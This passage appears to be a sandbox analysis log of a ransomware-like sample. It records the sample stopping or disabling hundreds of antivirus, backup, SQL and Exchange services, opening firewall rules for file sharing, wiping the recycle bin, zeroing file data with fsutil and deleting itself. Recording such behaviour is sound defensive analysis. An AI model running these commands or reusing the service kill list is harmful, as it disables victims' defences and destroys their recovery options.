  PID:4464
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sms_site_sql_backup /y
    3⤵
    PID:11388
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:3792
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:4584
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:4680
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
    3⤵
    PID:11528
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  - Drops file in Windows directory
  PID:224
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q D:\\$Recycle.bin
  2⤵
  PID:4648
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:200
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
  2⤵
  - Drops file in Windows directory
  PID:3100
- C:\Windows\SYSTEM32\net.exe
  "net.exe" start upnphost /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1512
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start upnphost /y
    3⤵
    PID:2192
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop avpsus /y
  2⤵
  PID:1848
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop avpsus /y
    3⤵
    PID:4156
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  PID:2076
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
    3⤵
    PID:1836
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfewc /y
  2⤵
  PID:2364
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfewc /y
    3⤵
    PID:4600
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop bedbg /y
  2⤵
  PID:2716
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop bedbg /y
    3⤵
    PID:2796
- C:\Windows\SYSTEM32\net.exe
  "net.exe" start FDResPub /y
  2⤵
  PID:3824
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start FDResPub /y
    3⤵
    PID:1328
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:4280
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:1192
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4720
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:1168
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBCFMonitorService /y
    3⤵
    PID:4664
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4724
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:1672
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooIT /y
    3⤵
    PID:4328
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:4568
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop stc_raw_agent /y
    3⤵
    PID:1564
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  PID:3292
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:1892
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop EhttpSrv /y
  2⤵
  PID:1032
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EhttpSrv /y
    3⤵
    PID:5200
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MMS /y
  2⤵
  PID:4468
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MMS /y
    3⤵
    PID:6764
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop EPSecurityService /y
  2⤵
  PID:1260
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EPSecurityService /y
    3⤵
    PID:6776
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:3964
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:6816
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  PID:4628
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop DefWatch /y
    3⤵
    PID:8588
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:5216
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:9520
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop klnagent /y
  2⤵
  PID:5528
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop klnagent /y
    3⤵
    PID:10576
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop TrueKeyScheduler /y
  2⤵
  PID:6424
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TrueKeyScheduler /y
    3⤵
    PID:10136
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLSERVERAGENT /y
  2⤵
  PID:6416
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLSERVERAGENT /y
    3⤵
    PID:11380
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:7324
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop CAARCUpdateSvc /y
    3⤵
    PID:12956
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:7316
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop CASAD2DWebSvc /y
    3⤵
    PID:12780
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  PID:8104
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccEvtMgr /y
    3⤵
    PID:12380
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos MCS Agent” /y
  2⤵
  PID:8564
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
    3⤵
    PID:13132
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop msexchangeadtopology /y
  2⤵
  PID:8552
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop msexchangeadtopology /y
    3⤵
    PID:13140
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “aphidmonitorservice” /y
  2⤵
  PID:8528
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “aphidmonitorservice” /y
    3⤵
    PID:1468
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSOLAP$TPS /y
  2⤵
  PID:8516
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$TPS /y
    3⤵
    PID:12800
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Zoolz 2 Service” /y
  2⤵
  PID:8508
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
    3⤵
    PID:12948
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ReportServer$TPSAMA /y
  2⤵
  PID:8500
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
    3⤵
    PID:12652
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Health Service” /y
  2⤵
  PID:8492
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Health Service” /y
    3⤵
    PID:13044
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSExchangeSRS /y
  2⤵
  PID:8484
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeSRS /y
    3⤵
    PID:12932
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:9048
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:5204
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:9856
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:12392
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Message Router” /y
  2⤵
  PID:9848
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop unistoresvc_1af40a /y
  2⤵
  PID:9840
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$BKUPEXEC /y
  2⤵
  PID:9832
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ARSM /y
  2⤵
  PID:9824
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos MCS Client” /y
  2⤵
  PID:9816
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop msexchangeimap4 /y
  2⤵
  PID:9780
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “intel(r) proset monitoring service” /y
  2⤵
  PID:9760
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSOLAP$TPSAMA /y
  2⤵
  PID:9752
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop DCAgent /y
  2⤵
  PID:9580
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SHAREPOINT /y
  2⤵
  PID:9572
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:9564
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AVP /y
  2⤵
  PID:9556
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SBSMONITORING /y
  2⤵
  PID:9540
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SBSMONITORING /
  2⤵
  PID:9528
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:9504
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop Antivirus /y
  2⤵
  PID:9488
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$PROFXENGAGEMENT /y
  2⤵
  PID:9476
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:9468
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:9460
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$PROD /y
  2⤵
  PID:9452
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:9440
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Web Control Service” /y
  2⤵
  PID:9428
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$PRACTTICEBGC /y
  2⤵
  PID:9416
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecDeviceMediaService /y
  2⤵
  PID:9408
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos System Protection Service” /y
  2⤵
  PID:9396
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$PRACTICEMGT /y
  2⤵
  PID:9384
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:9372
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Safestore Service” /y
  2⤵
  PID:9364
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop audioendpointbuilder /y
  2⤵
  PID:9352
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$ECWDB2 /y
  2⤵
  PID:9340
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$TPSAMA /y
  2⤵
  PID:9328
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ntrtscan /y
  2⤵
  PID:9316
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop EPUpdateService /y
  2⤵
  PID:7992
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
  2⤵
  PID:8632
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop W3Svc /y
  2⤵
  PID:8472
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSOLAP$SYSTEM_BGC /y
  2⤵
  PID:8464
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Veeam Backup Catalog Data Service” /y
  2⤵
  PID:8448
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ReportServer$TPS /y
  2⤵
  PID:8440
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos File Scanner Service” /y
  2⤵
  PID:8432
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSExchangeSA /y
  2⤵
  PID:8420
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop UI0Detect /y
  2⤵
  PID:8412
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSOLAP$SQL_2008 /y
  2⤵
  PID:8404
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Symantec System Recovery” /y
  2⤵
  PID:8392
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ReportServer$SYSTEM_BGC /y
  2⤵
  PID:8332
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Device Control Service” /y
  2⤵
  PID:8316
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSExchangeMTA /y
  2⤵
  PID:8304
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SstpSvc /y
  2⤵
  PID:8292
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop msftesql$PROD /y
  2⤵
  PID:8284
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “SQLsafe Filter Service” /y
  2⤵
  PID:8272
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ReportServer$SQL_2008 /y
  2⤵
  PID:8264
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SMTPSvc /y
  2⤵
  PID:8256
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Clean Service” /y
  2⤵
  PID:8248
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSExchangeMGMT /y
  2⤵
  PID:8240
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop POP3Svc /y
  2⤵
  PID:8232
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MsDtsServer110 /y
  2⤵
  PID:8224
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “SQLsafe Backup Service” /y
  2⤵
  PID:8216
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ReportServer /y
  2⤵
  PID:8208
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SamSs /y
  2⤵
  PID:8200
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos AutoUpdate Service” /y
  2⤵
  PID:5964
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSExchangeIS /y
  2⤵
  PID:6020
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop NetMsmqActivator /y
  2⤵
  PID:6936
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MsDtsServer100 /y
  2⤵
  PID:7152
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “SQL Backups /y
  2⤵
  PID:5776
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Enterprise Client Service” /y
  2⤵
  PID:7032
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:6896
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  PID:5256
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  PID:6992
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  PID:5792
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  PID:5832
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:7604
- - C:\Windows\system32\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:14144
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:7308
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:7300
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:7292
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:7284
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:7276
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:7268
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:7260
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop vapiendpoint /y
  2⤵
  PID:7252
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mssql$vim_sqlexp /y
  2⤵
  PID:7244
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop WRSVC /y
  2⤵
  PID:7236
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLTELEMETRY$ECWDB2 /y
  2⤵
  PID:7228
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop TrueKeyServiceHelper /y
  2⤵
  PID:7220
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLTELEMETRY /y
  2⤵
  PID:7212
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop TrueKey /y
  2⤵
  PID:6408
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLSafeOLRService /y
  2⤵
  PID:6400
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop tmlisten /y
  2⤵
  PID:6392
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLBrowser /y
  2⤵
  PID:6384
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop TmCCSF /y
  2⤵
  PID:6372
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2012 /y
  2⤵
  PID:6364
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop swi_update_64 /y
  2⤵
  PID:6356
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:6348
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop swi_update /y
  2⤵
  PID:6340
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$TPSAMA /y
  2⤵
  PID:6332
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop swi_service /y
  2⤵
  PID:6320
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$TPS /y
  2⤵
  PID:6312
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop swi_filter /y
  2⤵
  PID:6300
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$SYSTEM_BGC /y
  2⤵
  PID:6292
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop svcGenericHost /y
  2⤵
  PID:6284
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$SQLEXPRESS /y
  2⤵
  PID:6276
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$SOPHOS /y
  2⤵
  PID:6268
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$SQL_2008 /y
  2⤵
  PID:6260
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sophossps /y
  2⤵
  PID:6252
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$SHAREPOINT /y
  2⤵
  PID:6240
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SntpService /y
  2⤵
  PID:6232
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$SBSMONITORING /y
  2⤵
  PID:6220
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SmcService /y
  2⤵
  PID:6212
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$PROFXENGAGEMENT /y
  2⤵
  PID:6204
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop Smcinst /y
  2⤵
  PID:6196
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$PROD /y
  2⤵
  PID:6188
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ShMonitor /y
  2⤵
  PID:6180
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$PRACTTICEMGT /y
  2⤵
  PID:6172
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SepMasterService /y
  2⤵
  PID:6160
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$PRACTTICEBGC /y
  2⤵
  PID:6148
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SAVService /y
  2⤵
  PID:5268
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$ECWDB2 /y
  2⤵
  PID:4488
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SAVAdminService /y
  2⤵
  PID:5196
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$CXDB /y
  2⤵
  PID:5164
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sacsvr /y
  2⤵
  PID:4244
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$CITRIX_METAFRAME /y
  2⤵
  PID:4472
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SOPHOS /y
  2⤵
  PID:4680
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$BKUPEXEC /y
  2⤵
  PID:1352
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sms_site_sql_backup /y
  2⤵
  PID:4464
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3996
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfevtp /y
  2⤵
  PID:4452
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop RESvc /y
  2⤵
  PID:4500
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop wbengine /y
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4088
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfemms /y
  2⤵
  PID:5124
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ReportServer$SQL_2008 /y
  2⤵
  PID:200
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop wbengine /y
  2⤵
  PID:4512
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfefire /y
  2⤵
  PID:6140
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop OracleClientCache80 /y
  2⤵
  PID:6132
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:6124
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McTaskManager /y
  2⤵
  PID:6116
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MySQL80 /y
  2⤵
  PID:6108
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamRESTSvc /y
  2⤵
  PID:6100
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McShield /y
  2⤵
  PID:6088
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MySQL57 /y
  2⤵
  PID:6080
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:6072
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeFrameworkMcAfeeFramework /y
  2⤵
  PID:6064
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLServerOLAPService /y
  2⤵
  PID:6056
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamMountSvc /y
  2⤵
  PID:6048
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeFramework /y
  2⤵
  PID:5684
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLServerADHelper100 /y
  2⤵
  PID:5676
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamHvIntegrationSvc /y
  2⤵
  PID:5668
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeEngineService /y
  2⤵
  PID:5656
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLServerADHelper /y
  2⤵
  PID:5648
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamEnterpriseManagerSvc /y
  2⤵
  PID:5640
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MBEndpointAgent /y
  2⤵
  PID:5632
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLSERVER /y
  2⤵
  PID:5624
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamDeploySvc /y
  2⤵
  PID:5616
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MBAMService /y
  2⤵
  PID:5608
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$TPSAMA /y
  2⤵
  PID:5600
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:5588
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop masvc /y
  2⤵
  PID:5580
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$TPS /y
  2⤵
  PID:5572
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamCloudSvc /y
  2⤵
  PID:5564
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop macmnsvc /y
  2⤵
  PID:5556
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
  2⤵
  PID:5548
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamCatalogSvc /y
  2⤵
  PID:5540
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$SQL_2008 /y
  2⤵
  PID:5520
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamBrokerSvc /y
  2⤵
  PID:5512
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop kavfsslp /y
  2⤵
  PID:5504
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
  2⤵
  PID:5496
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamBackupSvc /y
  2⤵
  PID:5488
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop KAVFSGT /y
  2⤵
  PID:5480
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
  2⤵
  PID:5472
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLWriter /y
  2⤵
  PID:5464
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop KAVFS /y
  2⤵
  PID:5456
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
  2⤵
  PID:5448
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:5440
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop FA_Scheduler /y
  2⤵
  PID:5432
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2012 /y
  2⤵
  PID:5424
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SDRSVC /y
  2⤵
  PID:5416
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ESHASRV /y
  2⤵
  PID:5408
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:5400
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:5388
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop EsgShKernel /y
  2⤵
  PID:5380
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SYSTEM_BGC /y
  2⤵
  PID:5372
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mozyprobackup /y
  2⤵
  PID:5364
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:5288
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:5144
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$TPS /y
  2⤵
  PID:2920
- C:\Windows\SYSTEM32\net.exe
